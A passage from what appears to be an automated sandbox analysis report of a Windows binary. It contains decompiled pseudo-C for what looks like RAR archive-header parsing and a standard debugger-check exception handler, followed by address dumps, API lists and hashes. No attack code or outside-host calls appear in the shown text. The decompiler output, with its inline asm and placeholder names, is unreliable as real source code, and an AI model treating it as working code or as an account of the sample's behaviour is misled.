																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E009F0FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E009E1EDE(_t685 + 0x1028, _t671);
																		_t466 = E009EC300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E00A02B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E009EF749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E009FD890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E009EF749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E00A02B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E009E69E0(_t698);
																		_t484 = E00A02BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E009E69F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E009EF79F();
																	}
																	E009E1F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E009EC300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E009F08B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E009E3CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E009EC34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E009E6E03(0xa200e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E009E6BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E009EC269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E009F08B2(E009EC29E(_t698 + 0x24));
																		}
																		E009F06E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E009F0910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E009EC251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E009EC29E(_t698 + 0x24);
															_t491 = E009EC29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E009EC29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E009EC269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E009E1EF8(_t518);
							L133:
							E009E159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E009E3DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E009E3C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E009E607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}



















































































                            0x009e2692
                            0x009e269b
                            0x009e26a5
                            0x009e26ac
                            0x009e26b3
                            0x009e26b6
                            0x009e26bf
                            0x009e26c2
                            0x009e26c5
                            0x009e26cc
                            0x009e2734
                            0x009e2734
                            0x009e2737
                            0x009e273b
                            0x009e2744
                            0x009e2760
                            0x009e2766
                            0x009e2775
                            0x009e277d
                            0x009e2783
                            0x009e278e
                            0x009e2799
                            0x009e279c
                            0x009e27a2
                            0x009e27a8
                            0x009e27aa
                            0x009e27b8
                            0x009e27b8
                            0x009e27bb
                            0x009e27f0
                            0x009e27bd
                            0x009e27bd
                            0x009e27bd
                            0x009e27c0
                            0x009e27e4
                            0x009e27c2
                            0x009e27c2
                            0x009e27c2
                            0x009e27c5
                            0x009e27d8
                            0x009e27c7
                            0x009e27c7
                            0x009e27ca
                            0x009e27cc
                            0x009e27cc
                            0x009e27ca
                            0x009e27c5
                            0x009e27c0
                            0x009e27fa
                            0x009e2800
                            0x009e2806
                            0x009e2809
                            0x009e280f
                            0x009e2812
                            0x009e281d
                            0x009e2820
                            0x009e2821
                            0x009e2824
                            0x009e2844
                            0x009e284a
                            0x009e2850
                            0x009e2853
                            0x009e2859
                            0x009e285c
                            0x009e285f
                            0x009e2f78
                            0x009e2f80
                            0x009e2f87
                            0x009e2f8e
                            0x009e2f9b
                            0x009e2fad
                            0x009e2fb2
                            0x009e2fb8
                            0x009e2fca
                            0x009e2fd0
                            0x009e2fdd
                            0x009e2fea
                            0x009e2ff7
                            0x009e2ffd
                            0x009e2fff
                            0x009e300c
                            0x009e300e
                            0x009e300e
                            0x009e300f
                            0x009e300f
                            0x009e301b
                            0x009e302b
                            0x009e302b
                            0x009e302e
                            0x009e3034
                            0x009e303a
                            0x009e303c
                            0x009e303d
                            0x009e3042
                            0x009e304a
                            0x009e3050
                            0x009e30d9
                            0x009e30dc
                            0x00000000
                            0x009e30dc
                            0x009e3056
                            0x009e305c
                            0x009e305f
                            0x00000000
                            0x00000000
                            0x009e3061
                            0x009e3064
                            0x00000000
                            0x00000000
                            0x009e3066
                            0x009e3069
                            0x009e30ab
                            0x009e30b2
                            0x009e30b9
                            0x009e30be
                            0x009e30c2
                            0x00000000
                            0x00000000
                            0x009e30cb
                            0x009e30d0
                            0x00000000
                            0x009e30d0
                            0x009e306b
                            0x009e3072
                            0x00000000
                            0x00000000
                            0x009e307f
                            0x009e307f
                            0x009e3082
                            0x009e3088
                            0x009e308b
                            0x009e308f
                            0x009e3091
                            0x009e3098
                            0x009e309c
                            0x009e309f
                            0x009e30a2
                            0x009e30a2
                            0x009e30a2
                            0x009e30a7
                            0x009e30a9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e30a9
                            0x009e3001
                            0x009e3003
                            0x009e300a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e300a
                            0x009e2865
                            0x009e2f4e
                            0x009e2f4e
                            0x009e2f58
                            0x009e2f66
                            0x009e2f6c
                            0x009e2f6c
                            0x00000000
                            0x009e2f58
                            0x009e286b
                            0x009e286e
                            0x009e2902
                            0x009e290a
                            0x009e2919
                            0x009e291d
                            0x009e2920
                            0x009e2927
                            0x009e2930
                            0x009e2932
                            0x009e2936
                            0x009e293c
                            0x009e2941
                            0x009e294d
                            0x009e295a
                            0x009e2967
                            0x009e296d
                            0x009e2970
                            0x009e297d
                            0x009e297d
                            0x009e297d
                            0x009e297f
                            0x009e2981
                            0x009e2981
                            0x009e2987
                            0x009e298a
                            0x009e2996
                            0x009e2996
                            0x009e2998
                            0x009e2998
                            0x009e29a3
                            0x009e29a5
                            0x009e29aa
                            0x009e29b0
                            0x009e29b6
                            0x009e29bf
                            0x009e29cf
                            0x009e29cf
                            0x009e29b8
                            0x009e29b8
                            0x009e29ba
                            0x009e29ba
                            0x009e29d1
                            0x009e29e7
                            0x009e29ed
                            0x009e29fb
                            0x009e2a06
                            0x009e2a11
                            0x009e2a14
                            0x009e2a26
                            0x009e2a34
                            0x009e2a3f
                            0x009e2a4f
                            0x009e2a5d
                            0x009e2a60
                            0x009e2a65
                            0x009e2a68
                            0x009e2a6b
                            0x009e2a6e
                            0x009e2a71
                            0x009e2a73
                            0x009e2a75
                            0x009e2a77
                            0x009e2a77
                            0x009e2a75
                            0x009e2a80
                            0x009e2a86
                            0x009e2a8c
                            0x009e2ad1
                            0x009e2ad1
                            0x009e2ad4
                            0x009e2ade
                            0x009e2ae0
                            0x009e2af2
                            0x009e2af2
                            0x009e2afc
                            0x009e2afc
                            0x009e2b02
                            0x009e2b04
                            0x009e2b0e
                            0x009e2b13
                            0x009e2b15
                            0x009e2b17
                            0x009e2b21
                            0x009e2b21
                            0x009e2b13
                            0x009e2b28
                            0x009e2b2b
                            0x009e2b37
                            0x009e2b37
                            0x00000000
                            0x009e2b2d
                            0x009e2b2d
                            0x009e2b30
                            0x00000000
                            0x00000000
                            0x009e2b34
                            0x009e2b39
                            0x009e2b39
                            0x009e2b45
                            0x009e2b45
                            0x009e2b47
                            0x009e2b4d
                            0x009e2b7b
                            0x009e2b7f
                            0x009e2b81
                            0x009e2b83
                            0x009e2b83
                            0x009e2b83
                            0x009e2b86
                            0x009e2b86
                            0x009e2b91
                            0x009e2b97
                            0x009e2b9e
                            0x009e2ba4
                            0x009e2ba6
                            0x009e2bac
                            0x009e2bb3
                            0x009e2bb9
                            0x009e2bc0
                            0x009e2bc6
                            0x009e2bc6
                            0x009e2bcc
                            0x009e2bcf
                            0x009e2bd4
                            0x009e2bd7
                            0x009e2bd9
                            0x009e2bdb
                            0x009e2bdd
                            0x009e2bdd
                            0x009e2beb
                            0x009e2bf0
                            0x009e2bf2
                            0x009e2bf6
                            0x009e2bfd
                            0x009e2c7e
                            0x009e2c88
                            0x009e2c93
                            0x009e2c96
                            0x009e2c9d
                            0x009e2c9f
                            0x009e2c9f
                            0x009e2c9f
                            0x009e2ca2
                            0x009e2ca4
                            0x009e2da6
                            0x009e2caa
                            0x009e2cb3
                            0x009e2cb6
                            0x009e2cc5
                            0x009e2ccf
                            0x009e2cd3
                            0x009e2cda
                            0x009e2cdc
                            0x009e2ce2
                            0x009e2ce9
                            0x009e2cf2
                            0x009e2cf8
                            0x009e2cf9
                            0x009e2d05
                            0x009e2d09
                            0x009e2d0f
                            0x009e2d11
                            0x009e2d19
                            0x009e2d1f
                            0x009e2d21
                            0x009e2d2b
                            0x009e2d2d
                            0x009e2d38
                            0x009e2d40
                            0x009e2d5d
                            0x009e2d6d
                            0x009e2d73
                            0x009e2d76
                            0x009e2d81
                            0x009e2d89
                            0x009e2d8e
                            0x009e2d91
                            0x009e2d94
                            0x009e2d97
                            0x009e2d99
                            0x009e2d9b
                            0x009e2d9e
                            0x009e2d9e
                            0x009e2d99
                            0x009e2ce9
                            0x009e2cdc
                            0x009e2daf
                            0x009e2db6
                            0x009e2db8
                            0x009e2dba
                            0x009e2dba
                            0x009e2bff
                            0x009e2c01
                            0x009e2c04
                            0x009e2c07
                            0x009e2c0e
                            0x009e2c13
                            0x009e2c1f
                            0x009e2c24
                            0x009e2c27
                            0x009e2c29
                            0x009e2c2b
                            0x009e2c3e
                            0x009e2c48
                            0x009e2c48
                            0x009e2c4d
                            0x009e2c4d
                            0x009e2c4d
                            0x009e2c4f
                            0x009e2c52
                            0x009e2c54
                            0x009e2c56
                            0x009e2c5b
                            0x009e2c62
                            0x009e2c63
                            0x009e2c63
                            0x009e2c6b
                            0x009e2c6b
                            0x009e2dc1
                            0x009e2dc8
                            0x009e2dd6
                            0x009e2dd6
                            0x009e2de4
                            0x009e2de9
                            0x009e2df0
                            0x009e2ed4
                            0x009e2ef5
                            0x009e2efe
                            0x009e2f0a
                            0x009e2f10
                            0x009e2f18
                            0x009e2f1a
                            0x009e2f27
                            0x009e2f2e
                            0x009e2f33
                            0x009e2f37
                            0x009e2f44
                            0x009e2f44
                            0x009e2f37
                            0x00000000
                            0x009e2df6
                            0x009e2df9
                            0x009e2e07
                            0x009e2e10
                            0x009e2e19
                            0x009e2e1c
                            0x009e2e1e
                            0x009e2e20
                            0x009e2e23
                            0x009e2e25
                            0x009e2e28
                            0x009e2e2b
                            0x009e2e2d
                            0x009e2e35
                            0x009e2e37
                            0x009e2e3a
                            0x00000000
                            0x00000000
                            0x009e2e40
                            0x009e2e45
                            0x00000000
                            0x00000000
                            0x009e2e47
                            0x009e2e49
                            0x009e2e58
                            0x009e2e58
                            0x009e2e65
                            0x009e2e6a
                            0x009e2e6d
                            0x009e2e6f
                            0x009e2e6f
                            0x009e2e6f
                            0x009e2e6f
                            0x009e2e72
                            0x009e2e74
                            0x009e2e77
                            0x009e2e77
                            0x009e2e7a
                            0x009e2eab
                            0x009e2eab
                            0x009e2eab
                            0x009e2eb2
                            0x009e2eb9
                            0x009e2ebe
                            0x009e2e7c
                            0x009e2e7e
                            0x009e2e81
                            0x009e2e81
                            0x009e2e84
                            0x009e2e87
                            0x009e2e89
                            0x009e2e96
                            0x009e2e98
                            0x009e2e9e
                            0x009e2ea0
                            0x009e2ea3
                            0x009e2ea3
                            0x009e2ea3
                            0x009e2ea8
                            0x00000000
                            0x009e2ea8
                            0x009e2ec1
                            0x009e2ec1
                            0x009e2ec2
                            0x009e2ec5
                            0x009e2ec5
                            0x009e2ece
                            0x009e2ed1
                            0x00000000
                            0x009e2ed1
                            0x009e2df0
                            0x009e2b5a
                            0x009e2b5c
                            0x009e2b61
                            0x009e2b65
                            0x009e2b67
                            0x009e2b75
                            0x009e2b77
                            0x00000000
                            0x009e2b77
                            0x009e2b69
                            0x009e2b6c
                            0x00000000
                            0x00000000
                            0x009e2b70
                            0x00000000
                            0x009e2b71
                            0x009e2b2b
                            0x009e2ae2
                            0x009e2ae4
                            0x00000000
                            0x00000000
                            0x009e2ae6
                            0x009e2ae8
                            0x009e2aea
                            0x009e2aea
                            0x00000000
                            0x009e2a8e
                            0x009e2a8e
                            0x009e2a8e
                            0x009e2a91
                            0x009e2ac7
                            0x00000000
                            0x009e2ac7
                            0x009e2a94
                            0x009e2a94
                            0x009e2a97
                            0x009e2abb
                            0x00000000
                            0x009e2abb
                            0x009e2a99
                            0x009e2a99
                            0x009e2a9c
                            0x009e2aaf
                            0x009e2aaf
                            0x00000000
                            0x009e2aaf
                            0x009e2a9e
                            0x009e2aa1
                            0x00000000
                            0x00000000
                            0x009e2aa3
                            0x00000000
                            0x009e2aa3
                            0x009e2a8c
                            0x009e298c
                            0x009e298f
                            0x00000000
                            0x00000000
                            0x009e2993
                            0x00000000
                            0x009e2993
                            0x009e2972
                            0x009e2975
                            0x00000000
                            0x009e2977
                            0x009e2977
                            0x009e2979
                            0x00000000
                            0x009e2979
                            0x009e2975
                            0x009e2874
                            0x009e2877
                            0x00000000
                            0x009e287d
                            0x009e2889
                            0x009e2891
                            0x009e2899
                            0x009e28a8
                            0x009e28b0
                            0x009e28b3
                            0x009e28b9
                            0x009e28bf
                            0x009e28c5
                            0x009e28c7
                            0x009e28d1
                            0x009e28d1
                            0x009e28d7
                            0x009e28de
                            0x009e28ec
                            0x009e28ef
                            0x009e28f5
                            0x009e28f5
                            0x00000000
                            0x009e28de
                            0x009e2877
                            0x009e2814
                            0x009e281b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e281b
                            0x009e280b
                            0x009e280b
                            0x00000000
                            0x009e27ac
                            0x009e27ae
                            0x009e30df
                            0x009e30e2
                            0x009e30f0
                            0x009e30fb
                            0x009e30fb
                            0x009e27aa
                            0x009e2746
                            0x009e2748
                            0x00000000
                            0x009e2748
                            0x009e26d6
                            0x009e26d8
                            0x009e26da
                            0x009e26e0
                            0x00000000
                            0x009e26ec
                            0x009e26ee
                            0x009e26f2
                            0x009e26fc
                            0x009e26fe
                            0x009e2707
                            0x00000000
                            0x009e2709
                            0x009e2719
                            0x009e272a
                            0x009e272f
                            0x00000000
                            0x009e272f
                            0x009e2707

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E269B
                            • _strlen.LIBCMT ref: 009E2C1F
                              • Part of subcall function 009F0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009EB312,00000000,?,?,?,000201B4), ref: 009F0FFA
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E2D76
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                            • String ID: CMT
                            • API String ID: 1706572503-2756464174
                            • Opcode ID: e4fe58a3591e4d1c612b79c2e451207512c8bbfcac49b3246da2ee0db395117c
                            • Instruction ID: 00bdea94da7a483285b296d54285359aba02ac062e6cc9612428313501b83bfb
                            • Opcode Fuzzy Hash: e4fe58a3591e4d1c612b79c2e451207512c8bbfcac49b3246da2ee0db395117c
                            • Instruction Fuzzy Hash: 7A6203715002C48FDF1ADF76C8957EA3BE9AF54300F08457EED9A8B282DA70AD45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A07BE1, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E00A07BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xa1d668; // 0xda86b1c8
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E009FE690(_t41);
					_pop(_t61);
				}
				E009FE920(_t66,  &_v804, 0, 0x50);
				E009FE920(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E009FE690(_t57);
				}
				return E009FE203(_t57, _v8 ^ _t69);
			}




































                            0x00a07be1
                            0x00a07be1
                            0x00a07be1
                            0x00a07be1
                            0x00a07bec
                            0x00a07bf1
                            0x00a07bf3
                            0x00a07bfb
                            0x00a07bfd
                            0x00a07c00
                            0x00a07c05
                            0x00a07c05
                            0x00a07c11
                            0x00a07c24
                            0x00a07c32
                            0x00a07c38
                            0x00a07c3e
                            0x00a07c44
                            0x00a07c4a
                            0x00a07c50
                            0x00a07c56
                            0x00a07c5c
                            0x00a07c62
                            0x00a07c68
                            0x00a07c6f
                            0x00a07c76
                            0x00a07c7d
                            0x00a07c84
                            0x00a07c8b
                            0x00a07c92
                            0x00a07c93
                            0x00a07c9c
                            0x00a07ca2
                            0x00a07ca5
                            0x00a07cab
                            0x00a07cb8
                            0x00a07cc1
                            0x00a07cca
                            0x00a07cd3
                            0x00a07ce1
                            0x00a07ce3
                            0x00a07cf8
                            0x00a07d04
                            0x00a07d07
                            0x00a07d0c
                            0x00a07d1b

                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A07CD9
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A07CE3
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00A07CF0
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: a3a7312336f429f49895becbe0ed8e6acfe301d62bceb2ab5eba61af36495481
                            • Instruction ID: 89931fcf8157eac9f63bcb232091a1904f08d47e245617293b0352e9e04e7f0c
                            • Opcode Fuzzy Hash: a3a7312336f429f49895becbe0ed8e6acfe301d62bceb2ab5eba61af36495481
                            • Instruction Fuzzy Hash: D731B374D0121CABCB61DF64D989BECBBB8AF48310F5042DAE51CA72A0E7709F818F44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09FD3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E00A09FD3(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
